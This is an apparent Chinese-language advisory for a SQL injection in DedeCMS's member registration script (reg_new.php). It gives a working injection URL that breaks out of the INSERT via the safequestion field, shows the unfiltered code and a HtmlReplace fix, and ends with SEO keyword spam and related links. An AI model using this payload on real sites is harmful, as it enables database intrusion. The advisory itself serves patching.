1. 漏洞描述
Dedecms会员中心注入漏洞
2. 漏洞触发条件
/member/reg_new.php?dopost=regbase&step=1&mtype=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid=123asd123&uname=12asd13123&userpwd=123123&userpwdok=123123&email=1213asd123%40*.COM&safequestion=1','1111111111111','1389701121','127.0.0.1','1389701121','127.0.0.1'),('个人',user(),'4297f44b13955235245b2497399d7a93','12as11111111111111111d13123','','10','0','1213asd11111111111123@*.COM','100', '0','-10','','1&safeanswer=1111111111111&sex=&vdcode=slum&agree=
//把vdcode=slum改成当前的验证码
3. 漏洞影响范围
4. 漏洞代码分析
/member/reg_new.php
..
$jointime = time();
$logintime = time();
$joinip = GetIP();
$loginip = GetIP();
$pwd = md5($userpwd);
$spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0);
//未对$mtype、$safeanswer、$safequestion进行有效过滤就带入SQL查询
$inQuery = "INSERT INTO `dede_member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,
`matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )
VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores',
'0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); ";
if($dsql->ExecuteNoneQuery($inQuery))
..
5. 防御方法
/member/reg_new.php
..
$jointime = time();
$logintime = time();
$joinip = GetIP();
$loginip = GetIP();
$pwd = md5($userpwd);
/* 对$mtype、$safeanswer、$safequestion进行有效过滤 */
$mtype = HtmlReplace($mtype,1);
$safeanswer = HtmlReplace($safeanswer);
$safequestion = HtmlReplace($safequestion);
/* */
$spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0);
$inQuery = "INSERT INTO `dede_member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,
`matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )
VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores',
'0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); ";
if($dsql->ExecuteNoneQuery($inQuery))
{
..
红色部分是添加的代码
# new.php SQL注入漏洞修复
# 织梦member/reg
# space
# safequestion
# userpwdok
# email
# user
# userpwd
# CB
# mtype
# uname
# 未对
# 验证码
# SQL注入漏洞
# 织梦漏洞
# 织梦CMS教程
# userid
# 牟平个性化网站优化公司
# 长春搜索seo优化服务
# 内部seo和外部seo
# 营销推广知识点总结图片
# 定制网站建设品牌推荐
# 专业*seo企业
# seo营销
# 西藏seo入门多少*
# 深圳手机端网站建设专业
# SEO故事绘本插画
# 温州*seo达人
# 舟山营销推广学习
# 长春市场推广招聘网站
# 蔡甸关键词排名方法
# 南通网站推广运营公司
# 徐州seo技术培训
# 武汉网站推广皆往乐云seo
# 酒店餐饮营销推广计划书
# 抚州网站建设广告
# 杭州seo营销价格
# img
# style
# text
# oss
# cn
# hongkong
# src
# public
相关栏目:
【
Google疑问12 】
【
Facebook疑问10 】
【
网络优化91478 】
【
技术知识72672 】
【
云计算0 】
【
GEO优化84317 】
【
优选文章0 】
【
营销推广36048 】
【
网络运营41350 】
【
案例网站102563 】
【
AI智能45237 】
相关推荐:
建站助手如何使用?三步轻松搭建网站
如何在沈阳梯子盘古建站优化SEO排名与功能模块?
织梦arclist标签实现分页的方法_织梦CMS教程
织梦在PHP5.4以上版本后台登录空白的解决方法_织梦CMS教程
建站助手哪个好用?2025热门工具推荐与对比评测
如何快速搭建高效香港服务器网站?
如何快速生成橙子建站落地页链接?
建站主机选哪家性价比最高?
织梦php7数据库备份无结果BUG修复方法_织梦CMS教程
建站主机解析:虚拟主机配置与服务器选择指南
织梦dedecms注入漏洞pm.php修复方法_织梦CMS教程
织梦cms开启二级域名手机站(多站点)内容页图片无法显示_织梦CMS教程
如何快速查询网址的建站时间与历史轨迹?
如何快速完成中国万网建站详细流程?
建站主机与虚拟主机有何区别?如何选择最优方案?
网站TAG标签正确使用方法_SEO优化教程
如何通过IIS搭建网站并配置访问权限?
织梦dedecms常用内容统计代码(sql调用)_织梦CMS教程
织梦发布文章添加禁用词语过滤功能_织梦CMS教程
广州美橙建站如何快速搭建多端合一网站?
如何快速辨别茅台真假?关键步骤解析
织梦手机站内容页图片自适应去除style样式标签_织梦CMS教程
建站助手v4.0建站流程详解:核心步骤与参数设置指南
建站助手软件包:智能网站模板生成与SEO优化工具一键整合
织梦kindeditor文本编辑器增加“查找替换”功能_织梦CMS教程
常州自助建站费用包含哪些项目?
魔方云NAT建站如何实现端口转发?
如何测试您的网站全球打开速度-网站海外测速工
黑客入侵网站服务器的常见手法有哪些?
织梦注册中文会员无法打开空间的解决方法_织梦CMS教程
织梦每天自动更新首页利于SEO优化_织梦CMS教程
织梦dedecms后台自定义表单添加搜索功能_织梦CMS教程
织梦cms发布文章实时推送地址给百度收录的二种方法_织梦CMS教程
建站之星如何修改网站生成路径?
如何挑选优质建站一级代理提升网站排名?
如何在IIS7中新建站点?详细步骤解析
如何快速搭建个人网站并优化SEO?
建站之星下载版如何获取与安装?
高端建站三要素:定制模板、企业官网与响应式设计优化
如何正确下载安装西数主机建站助手?
织梦搜索页面实现相关搜索调用_织梦CMS教程
dedecms织梦会员通过邮箱找回密码方法_织梦CMS教程
织梦tag列表页调用内容模型自定义字段教程_织梦CMS教程
dedecms织梦自定义表单地区联动类型不可用的解决方案_织梦CMS教程
娃派WAP自助建站:免费模板+移动优化,快速打造专业网站
dedecms织梦静态页实现动态显示随机文章的方法_织梦CMS教程
织梦dedecms实现文章上传图片自动添加alt属性的教程_织梦CMS教程
如何获取PHP WAP自助建站系统源码?
如何在宝塔面板中创建新站点?
织梦文章简介[field:description /]如何修改字数限制_织梦CMS教程
2018-06-27
南京市珐之弘网络技术有限公司专注海外推广十年,是谷歌推广.Facebook广告全球合作伙伴,我们精英化的技术团队为企业提供谷歌海外推广+外贸网站建设+网站维护运营+Google SEO优化+社交营销为您提供一站式海外营销服务。
